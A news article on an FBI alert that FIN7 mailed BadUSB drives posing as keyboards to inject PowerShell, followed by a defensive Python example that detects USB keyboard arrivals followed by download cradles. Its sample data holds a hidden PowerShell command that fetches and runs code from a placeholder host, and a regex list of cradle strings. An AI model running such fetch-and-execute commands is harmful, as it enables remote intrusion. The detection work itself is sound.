Organizations in the transportation, defense and insurance industries should be on the lookout for suspicious USB drives that arrive in the mail, as they may contain malicious payloads and ransomware.
According to a new FBI alert obtained by CNN, The Record, Bleeping Computer and other publications, the ransomware group FIN7, the same group that has deployed the BlackMatter and REvil ransomware strains, is behind this campaign.
In the advisory, the FBI says companies in those sectors received a series of fake letters via the Postal Service and UPS from August to November, with the senders impersonating the Department of Health and Human Services and Amazon.
However, those packages contained a USB stick loaded with malicious software that, if inserted into an endpoint, could give the threat actors access to the network or the ability to deploy ransomware, according to reports.
CNN reports that the FBI blamed FIN7, which it calls an “Eastern European cybercrime operation” that U.S. officials have blamed for billions of dollars in losses to businesses and consumers around the world.
“The Justice Department has accused FIN7 of stealing millions of credit card numbers from restaurant and hospitality chains in 47 states, and FBI agents have pursued FIN7 operatives for years,” CNN reported.
According to The Record, when inserted, the USB drive executes a BadUSB attack: rather than presenting itself as storage, the drive registers itself with the operating system as a keyboard. The device then sends a series of preconfigured automated keystrokes to the PC that run PowerShell commands, which in turn download malware serving as a backdoor into the victim's network.
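The chain described above leaves a recognisable trace on the endpoint: a USB device enumerating in the Keyboard class, followed within seconds by a PowerShell script block containing a download cradle. The following detection logic is an added example written for this page, not code from the FBI alert or from any of the publications cited. It correlates the two kinds of records within a short time window. The event records, the device instance paths (including the VID/PID values, which are placeholders), and the cradle pattern list are all constructed for the example and are not indicators from the advisory.

```python
"""Correlate USB keyboard-class device arrivals with PowerShell script-block
activity, the sequence a keystroke-injecting BadUSB drop produces.
Constructed example: the records below are invented, not FBI data."""
from dataclasses import dataclass
from datetime import datetime, timedelta
import re


@dataclass
class Event:
    ts: datetime
    kind: str      # "pnp" (device arrival) or "ps" (PowerShell script block)
    detail: str    # "class=<PnP class> instance=<path>" or the script text


# Strings typical of the download-cradle stage of an injected payload.
# Heuristic list chosen for this example, not an FBI indicator list.
CRADLE_PATTERNS = [
    r"DownloadString\(", r"DownloadFile\(", r"Invoke-WebRequest", r"\biwr\b",
    r"\biex\b", r"Invoke-Expression", r"-enc(odedcommand)?\b",
    r"-w(indowstyle)?\s+hidden",
]
CRADLE_RE = re.compile("|".join(CRADLE_PATTERNS), re.IGNORECASE)

# Keyboard-class device whose instance path shows it arrived over USB
# (Windows PnP paths for USB devices start with USB\VID_xxxx&PID_xxxx).
# A built-in laptop keyboard enumerates under ACPI and is ignored.
USB_KBD_RE = re.compile(r"class=Keyboard\b.*\bUSB\\VID_", re.IGNORECASE)


def find_badusb_chains(events, window=timedelta(seconds=60)):
    """Return (keyboard_event, powershell_event) pairs where a script block
    carrying a download cradle ran within `window` of a USB keyboard arrival."""
    events = sorted(events, key=lambda e: e.ts)
    hits = []
    for i, kb in enumerate(events):
        if kb.kind != "pnp" or not USB_KBD_RE.search(kb.detail):
            continue
        for ps in events[i + 1:]:
            if ps.ts - kb.ts > window:
                break            # events are sorted, so nothing later can match
            if ps.kind == "ps" and CRADLE_RE.search(ps.detail):
                hits.append((kb, ps))
    return hits


# Constructed sample timeline. VID_1234/PID_ABCD are placeholder values.
T0 = datetime(2021, 11, 3, 9, 14, 0)
SAMPLE_EVENTS = [
    # Ordinary thumb drive, then an admin's benign command: no alert.
    Event(T0, "pnp", "class=DiskDrive instance=USB\\VID_1234&PID_0001\\SERIAL01"),
    Event(T0 + timedelta(seconds=5), "ps", "Get-ChildItem C:\\Users"),
    # A 'drive' that enumerates as a keyboard, followed by a hidden cradle.
    Event(T0 + timedelta(minutes=20), "pnp",
          "class=Keyboard instance=USB\\VID_1234&PID_ABCD\\6&2A3B"),
    Event(T0 + timedelta(minutes=20, seconds=4), "ps",
          "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
          ".DownloadString('http://example.invalid/a')\""),
    # Built-in keyboard re-enumerating after a resume, then a benign command.
    Event(T0 + timedelta(hours=2), "pnp", "class=Keyboard instance=ACPI\\PNP0303\\4&1F2C"),
    Event(T0 + timedelta(hours=2, seconds=2), "ps", "Get-Process"),
]

if __name__ == "__main__":
    for kb, ps in find_badusb_chains(SAMPLE_EVENTS):
        print(f"{kb.ts:%H:%M:%S} USB keyboard arrived: {kb.detail}")
        print(f"{ps.ts:%H:%M:%S} cradle {ps.ts - kb.ts} later: {ps.detail}")
```

In production the "pnp" records would come from the Kernel-PnP or DriverFrameworks-UserMode operational logs and the "ps" records from PowerShell script block logging (Event ID 4104), which must be enabled by policy; without script block logging the second half of the chain is invisible. The window is deliberately short because injected keystrokes run the cradle within seconds of enumeration, whereas a human plugging in a keyboard and then opening PowerShell takes longer.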
The publication cites the FBI, which said it has observed hackers obtain administrative access and move laterally to other local systems.
“[The] FIN7 actors then used a variety of tools—including Metasploit, Cobalt Strike, PowerShell scripts, Carbanak, GRIFFON, DICELOADER, TIRION—and deployed ransomware, including BlackMatter and REvil, on the compromised network,” the agency added, according to The Record.
In one case, the hackers sent a U.S. defense industry company a fake Amazon package that contained a thank-you letter, a fake gift card and the USB drive.